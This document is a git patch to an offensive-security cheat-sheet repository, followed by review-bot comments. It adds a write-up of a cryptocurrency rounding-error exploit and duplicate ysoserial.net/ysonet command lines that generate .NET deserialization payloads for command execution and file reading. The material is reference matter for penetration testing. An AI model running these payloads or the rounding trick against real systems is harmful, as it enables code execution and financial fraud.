From cd15d8596972e4c85bc03669404f6fa73131b98e Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 3 Aug 2025 16:32:40 +0200 Subject: [PATCH] Rounding Errors --- Business Logic Errors/README.md | 14 ++++++++++++++ Insecure Deserialization/DotNET.md | 23 ++++++++++++++++------- Insecure Randomness/README.md | 9 +++++---- 3 files changed, 35 insertions(+), 11 deletions(-) diff --git a/Business Logic Errors/README.md b/Business Logic Errors/README.md index 64a1989..a3f0a58 100644 --- a/Business Logic Errors/README.md +++ b/Business Logic Errors/README.md @@ -13,6 +13,7 @@ * [Refund Feature Exploitation](#refund-feature-exploitation) * [Cart/Wishlist Exploitation](#cartwishlist-exploitation) * [Thread Comment Testing](#thread-comment-testing) + * [Rounding Error](#rounding-error) * [References](#references) ## Methodology 
@@ -73,6 +74,19 @@ Common examples of Business Logic Errors. * If the system allows comments by verified or privileged users, try to mimic these parameters and see if you can comment as well. * Attempt to post comments impersonating other users. +### Rounding Error + +The report [hackerone #176461](https://web.archive.org/web/20170303191338/https://hackerone.com/reports/176461) describes a business logic flaw in a cryptocurrency platform (using XBT/Bitcoin), where an attacker exploits a rounding error in the internal transfer system to generate money out of nothing. + +The attacker initiate a transfer of 0.000000005 XBT (0.5 satoshi), this is below the system's minimum precision which is 1 satoshi minimum. + +* Sender's balance doesn't change. The algorithm might be rounded down to 0 satoshi. +* Receiver's balance increases by 1 satoshi (0.00000001). The algorithm might be rounding up to 1 satoshi. + +The attacker generated 0.00000001 XBT from nothing, since there's no rate limit, OTP, or fraud detection, the attacker can automate this process and repeat it infinitely, effectively printing money. + +In this example, instead of rounding and rejecting or enforcing a minimum transfer, it ignores the deduction from the sender and credits the receiver. + ## References * [Business Logic Vulnerabilities - PortSwigger - 2024](https://portswigger.net/web-security/logic-flaws) diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md index 0e47617..201697b 100644 --- a/Insecure Deserialization/DotNET.md +++ b/Insecure Deserialization/DotNET.md 
@@ -28,14 +28,23 @@ Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=` ## Tools -* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net) +* [pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net) - Deserialization payload generator for a variety of .NET formatters -```ps1 -cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s -./ysoserial.exe -p DotNetNuke -m read_file -f win.ini -./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t -./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t -``` + ```ps1 + cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s + ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini + ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t + ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t + ``` + +* [irsdl/ysonet](https://github.com/irsdl/ysonet) - Deserialization payload generator for a variety of .NET formatters + + ```ps1 + cat my_long_cmd.txt | ysonet.exe -o raw -g WindowsIdentity -f Json.Net -s + ./ysonet.exe -p DotNetNuke -m read_file -f win.ini + ./ysonet.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t + ./ysonet.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t + ``` ## Formatters diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md index 1f9916e..ea74381 100644 --- a/Insecure Randomness/README.md +++ b/Insecure Randomness/README.md 
@@ -199,10 +199,11 @@ Generic identification and sandwich attack: ## References -* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust) +* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction) +* [Cracking Time-Based Tokens: A Glimpse from a Workshop During leHACK 2025-Singularity - 4m1d0n - June 30, 2025](https://4m1d0n.github.io/retex-insecure-time-token-sandwich-attack/) +* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01) * [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/) +* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust) +* [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html) * [Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) *(FR)* * [Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) *(EN)* -* [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the 
sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html) -* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01) -* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction)
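Review bot: in the Rounding Error hunk of Business Logic Errors/README.md the mitigation is only implied by the closing sentence ("instead of rounding and rejecting or enforcing a minimum transfer, it ignores the deduction from the sender and credits the receiver"); state it explicitly so the section is usable as guidance: reject any transfer below the smallest representable unit (1 satoshi) before any rounding happens, keep balances as integer satoshi rather than fractional XBT, and apply one rounding rule to both the debit and the credit so the two sides always sum to zero. The prose also needs a grammar pass: "The attacker initiate a transfer of 0.000000005 XBT (0.5 satoshi), this is below the system's minimum precision which is 1 satoshi minimum." should read "The attacker initiates a transfer of 0.000000005 XBT (0.5 satoshi), which is below the system's minimum precision of 1 satoshi."; "The algorithm might be rounded down to 0 satoshi" should be "The algorithm might round down to 0 satoshi"; and "The attacker generated 0.00000001 XBT from nothing, since there's no rate limit, OTP, or fraud detection, the attacker can automate..." is a run-on that is clearer split after "from nothing".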
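Review bot: in the Tools hunk of Insecure Deserialization/DotNET.md the new irsdl/ysonet entry reuses the ysoserial.net description word for word and repeats the same four commands with only the binary renamed, which gives the reader no basis for choosing between the two; either say how the tools relate or reduce the second block to the invocations that actually differ. A small consistency point in both blocks: the first line calls the binary as `ysoserial.exe` / `ysonet.exe` behind a pipe while the remaining lines use `./ysoserial.exe` / `./ysonet.exe`; pick one form.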
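Review bot: the References hunk of Insecure Randomness/README.md re-sorts the list alphabetically and adds the leHACK 2025 entry, but neither the hunk nor the commit subject says so; a reviewer has to match the removed and added lines to see that only one entry is new. The subject line "Rounding Errors" covers only the first file, so the ysonet addition and this reordering would be clearer as separate commits or at least listed in the message body.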